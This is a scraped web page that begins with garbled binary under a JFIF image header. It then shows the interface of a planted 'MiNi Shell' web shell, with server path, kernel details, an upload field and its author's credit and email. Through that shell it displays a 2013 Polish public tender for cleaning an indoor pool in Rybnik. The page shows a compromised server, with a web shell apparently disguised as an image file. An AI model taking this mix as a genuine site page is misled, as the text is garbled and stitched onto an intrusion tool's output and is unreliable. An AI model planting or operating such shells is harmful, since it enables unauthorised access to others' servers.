JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130802/312442-N-2013.html

<p class="kh_header"><b>Rybnik: Usługi utrzymania porządku i czystości w obiekcie krytej pływalni 
w Rybniku - Boguszowicach przy ul. Jastrzębskiej 3a</b><br>
<b>Numer ogłoszenia: 312442 - 2013; data zamieszczenia: 02.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. Gliwicka 72, 44-200 Rybnik, woj. śląskie, tel. (032) 422 78 39, faks (032) 422 78 37.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosir.rybnik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi utrzymania porządku i czystości w obiekcie krytej pływalni 
w Rybniku - Boguszowicach przy ul. Jastrzębskiej 3a.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi utrzymania porządku i czystości  w pomieszczeniach wewnętrznych pływalni krytej w strefie mokrej i suchej, w Rybniku - Boguszowicach przy ul. Jastrzębskiej 3a. Wykaz powierzchni wraz z metrażem pomieszczeń, zakresem czynności, harmonogramem ich wykonywania i wymaganiami dotyczącymi używanych środków chemicznych przedstawiono poniżej.


I. Wykaz powierzchni:
lokalizacja	rodzaj powierzchni	ilość m2
biura, pomieszczenia socjalne	wykładzina PCV	179,6 m2
sanitariaty, szatnie, itd. - ściany	płytki ceramiczne	1200 m2
sanitariaty podłogi	                            płytki ceramiczne	98,3 m2
schody, korytarze,	gres	588,3 m2
hol główny podłogi	płytki ceramiczne	72 m2
szatnia podłogi	płytki ceramiczne	272,8 m22winda	stal nierdzewna	2,9 m2
widownia	płytki ceramiczne	394,6 m2
prysznice	płytki ceramiczne	71,5 m2
pomieszczenia socjalne	mieszana	60,7 m2
sauna	płytki ceramiczne, drewno	54,1 m2
barek samoobsługowy	wykładzina PCV	59,8 m2
plaża basenowa	płytki ceramiczne	516,9 m2
przeszklenia wejść i holi do 2 m	szkło	130,22 m2
maty wejściowe (4 sztuki)	    wykładzina	16,24 m2
przeszklenia fasady od wewnątrz do 2 m	          szkło	69,04 m2
ścianki z luksferów	pustaki szklane	39,50 m2
barierki wewnętrzne i zewnętrzne, pochwyty	stal chromoniklowa	308 mb
okna otwierane	szkło	17,3 m2
lustra	szkło	21,27 m2
pokrywy kanałów wentylacyjnych	płyta HPL	78,22 m2
sala konferencyjna	wykładzina PCV	46,5 m2

II. Ilość urządzeń sanitarnych i wyposażenia 
umywalki	46, muszle klozetowe 23, pisuary 4, prysznice 18, prysznice z kabinami	6, podajniki na mydło w płynie 21, podajniki na papier toaletowy 30, grzejniki	48, zlewy (jedno i dwu-komorowe) 2, szafki ubraniowe 256, kosze na śmieci 5 x 50l  i 38 x 15l, nogomyje 6.

III. Informacje odnośnie realizacji przedmiotu zamówienia
Do obowiązków Wykonawcy należeć będzie wykonanie prac zgodnie z podanym harmonogramem:
- pływalnia MOSiR w Rybniku - Boguszowicach czynna przez 7 dni w tygodniu od 6.00 do 22.00
- utrzymanie czystości w systemie serwisu dziennego musi być zapewnione w godz. 6.00 - 22.00. Do zadań serwisu będzie należało bieżące utrzymanie czystości na terenie obiektu oraz bieżące uzupełnianie materiałów eksploatacyjnych (papier toaletowy, mydło w płynie, odświeżacze powietrza, worki na śmieci).    
- codzienne sprzątanie zasadnicze polegające na utrzymaniu czystości na powierzchniach wewnętrznych obiektu w systemie nocnym powinno się odbywać w godzinach, w których obiekt jest zamknięty dla klientów tj. od 22.00 do 6.00,
- sprzątanie pomieszczeń socjalnych, biurowych, technicznych, trenerów, sędziów, oraz pomieszczeń ratowników - 2 razy w tygodniu
-  zabezpieczenie obsługi szatni w godz. 6.00 - 22.00 przez min. 1 osobę. Usługa realizowana przez 7 dni  w tygodniu zgodnie z ustalonym z zamawiającym harmonogramem i zakresem czynności.
- pracownicy wykonawcy realizujący usługę powinni być ubrani w jednakowe stroje robocze
- Wykonawca zapewnia specjalistyczny sprzęt jak również profesjonalne środki chemiczne posiadające odpowiednie dopuszczenia do obrotu i stosowania, nie zmieniające struktury wody basenowej, niezbędne do realizacji przedmiotu zamówienia
- Wykonawca zapewnia materiały eksploatacyjne typu: papier toaletowy, mydło w płynie, wkłady dezynfekcyjne  do WC, odświeżacze powietrza, worki na śmieci, itd.

IV. Szczegółowy wykaz czynności wraz z ich częstotliwością:

Sprzątanie powierzchni ogólnych:
1.	Odkurzanie mat wejściowych	codziennie
2.	Mycie ręczne i mechaniczne posadzek	codziennie
3.	Opróżnianie koszy i wymiana wkładów foliowych	codziennie
4.	Mycie i dezynfekcja koszy na śmieci z zewnątrz i od wewnątrz	codziennie
5.	Mycie i przecieranie dostępnych przeszkleń wejść i holi do wysokości 2 m	     codziennie
6.	Czyszczenie barierek i pochwytów wewnątrz i na zewnątrz budynku 	1 x 2 tygodnie
7.	Utrzymanie w czystości windy osobowej	codziennie
8.	Mycie holi	codziennie
9.	Mycie i dezynfekcja łazienek i sanitariatów	codziennie
10.	Mycie schodów	codziennie
11.	Mycie kaloryferów 	1 x 6 miesięcy

Sprzątanie pomieszczeń szatni, pryszniców oraz sanitariatów:
1. 	Mycie i dezynfekcja urządzeń sanitarnych (umywalki, baterie, kabiny 
		prysznicowe, miski klozetowe, pisuary, itp.)	na bieżąco
2. 	Mycie i dezynfekcja szafek ubraniowych	codziennie
3. 	Ściąganie kurzy z szafek ubraniowych 	            1 x tydzień
4. 	Mycie i dezynfekcja powierzchni podłóg i ścian pokrytych ceramiką	codziennie 
5. 	Opróżnianie koszy i wymiana wkładów foliowych	codziennie 
6. 	Mycie i dezynfekcja koszy na śmieci z zewnątrz i od wewnątrz	codziennie 
7. 	Mycie i dezynfekcja podajników na mydło i papier toaletowy	codziennie 
8. 	Mycie luster	codziennie 
9. 	Mycie i dezynfekcja ścian w przebieralni i szatni 	codziennie 
10. 	Mycie i dezynfekcja kabin przebieralni (8 kabin)	codziennie 
11. 	Odkurzanie, mycie i dezynfekcja suszarek do włosów w holach szatniowych 	codziennie 
12. 	Przecieranie i dezynfekcja kanap w holu szatniowym	codziennie 
13. 	Mycie i dezynfekcja ścianek działowych w toaletach przy prysznicach	codziennie
14. Mycie i dezynfekcja ścianek z luksferów	codziennie
15. Mycie nogomyjów	2 x dziennie	 

Sprzątanie pomieszczeń sauny (4 sauny):
1. 	Mycie i dezynfekcja siedzisk	codziennie 
2. 	Mycie i dezynfekcja podłóg, ścian i sufitów w saunach 	codziennie 
3. 	Mycie i dezynfekcja drzwi szklanych	codziennie
4. 	Mycie i dezynfekcja toalet i umywalek	codziennie
5. 	Mycie i dezynfekcja natrysków przy saunach	codziennie  
6. 	Mycie całości posadzek w saunach	codziennie 
7. 	Mycie i dezynfekcja wnęk pryszniców	codziennie	 

Sprzątanie części basenowej:
1.mycie ręczne i mechaniczne oraz dezynfekcja powierzchni ,plaży,wokół basenu dużego i małego (w godzinach nocnych)                    codziennie
2.mycie i dezynfekcja ścian pokrytych płytkami ceramicznymi  (w godzinach nocnych)                                                	codziennie                              
3.mycie murków wokół basenów                                                                        	codziennie
4.	mycie wyposażenia basenów   	1 x na tydzień
5.	zraszanie, przecieranie, odkurzanie roślinności              	1 x na tydzień
6.	mycie dostępnych przeszkleń wewnętrznych basenów 
      (do wysokości 2 m )                           	codziennie
7.	czyszczenie siedzisk ratowników rozmieszczonych wokół basenów              	codziennie 
8.	czyszczenie poręczy i barierek metalowych wokół niecki basenu               	1 x 2 tygodnie
9.	mycie pokrywy kanałów wentylacyjnych	1 x 2 miesiące
10.	mycie przeszkleń fasady od wewnątrz do wys. 2 m 	1 x 2 miesiące
11.	mycie i dezynfekcja jacuzzi (powierzchnia z tworzywa sztucznego)	codziennie
12.	mycie przelewów basenu sportowego i rekreacyjnego 	codziennie	
Zamawiający informuje, że czyszczenie i dezynfekcję dna oraz ścian basenów dużego i małego będzie wykonywał we własnym zakresie.

Pomieszczenia socjalne pracowników technicznych i biurowych, pomieszczenia ratowników, trenerów, sędziów
1. Mycie podłóg (wykładzina PCV)                      	2 x na tydzień
3. Mycie wyposażenia biurowego i mebli                         	2 x na tydzień

Widownia
1. mycie krzesełek 	1 x tydzień
2. mycie powierzchni podłogi	1 x tydzień 

Barek samoobsługowy 
1. Mycie podłogi (wykładzina PCV) 	codziennie
2. Mycie siedzisk i stolików (siedziska 6 szt., stoliki  3 szt.)	na bieżąco

Sala konferencyjna 
1. Mycie podłogi (wykładzina PCV)	2 x miesiąc
2. Odkurzanie mebli                           1 x miesiąc

V. Personel
Do realizacji zamówienia Wykonawca winien skierować grupę pracowników w ilości: 
- co najmniej 3 osoby - zmiana nocna od 22.00 do 6.00
- co najmniej 2 osoby - serwis dzienny od 6.00 do 22.00 
- co najmniej 1 osoba - obsługa szatni 6.00 do 22.00, 
Wykonawca musi zagwarantować i zabezpieczyć wyżej podane obłożenie personalne przez cały czas funkcjonowania obiektu tj. 7 dni w tygodniu do realizacji przedmiotu zamówienia  zgodnie z opisem w  SIWZ

VI. Środki chemiczne
Opis charakterystyki środków chemicznych. 
Zastosowane środki muszą posiadać odpowiednie dopuszczenia do obrotu i stosowania. Środki chemiczne stosowane w obszarze niecki basenowej tj. plaża basenowa, powinny posiadać  odpowiednie właściwości nie zmieniające struktury wody basenowej.

1.Środek do dezynfekcji powierzchni w pomieszczeniach basenowych, natryskowych, łazienkach, sanitariatach, saunach, solariach i siłowniach sportowych
2.Roztwór grzybobójczy do nogomyjów 
3.Kwaśny środek do mycia innych powierzchni na pływalni
4.Środek alkaliczny do mycia powierzchni basenów, ich otoczenia oraz do zmywania zabrudzeń nad lustrem wody w postaci płynnej
5.Środek czyszczący odkamieniający otoczenia wokół basenów oraz urządzeń sanitarnych
6.Środek czyszczący do mycia powierzchni ze stali nierdzewnej, porcelany, armatury chromowej i emalii kwasoodpornej
7.Preparat do utrzymania czystości w saunach z dodatkiem środka bakteriobójczego

Wykonawca jest zobowiązany do zapewnienia odpowiednich środków spełniających w/w wymagania wraz z opisem technologii ich zastosowania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, wykonał lub wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie,                       co najmniej dwie usługi polegające na utrzymaniu porządku i czystości w obiekcie pływalni przez okres minimum                       10 miesięcy o wartości nie mniejszej niż 200 000,00 zł brutto każda.

W przypadku inwestycji, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN po przeliczeniu średnim kursem NBP na dzień zakończenia inwestycji (w przypadku inwestycji rozliczanych wyłącznie w walutach innych niż PLN).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże narzędzia i urządzenia techniczne dostępne Wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami. Wykonawca jest zobowiązany do wykazania następujących narzędzi i urządzeń:
a)	 specjalistyczne odkurzacze do pracy mokro/sucho na obiekty basenowe - minimum 2 szt.,
b)	 profesjonalne wózki serwisowe wielofunkcyjne - minimum 3 szt.
c)	 szorowarka tarczowa - minimum 1 szt.,
d)	 myjka ciśnieniowa min 140 bar - minimum 1 szt.,
e)	 odkurzacz biurowy - min. 1 szt
f)	 maszyna szorująco - czyszcząca - automat pchany przez operatora, zasilany bateriami - minimum 1 szt.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy (załącznik nr 1 do SIWZ).
Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mosir.rybnik.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji, ul. Gliwicka 72, 44 - 200  Rybnik, sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2013 godzina 10:00, miejsce: sekretariat MOSiR, ul. Gliwicka 72, 44-200 Rybnik.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com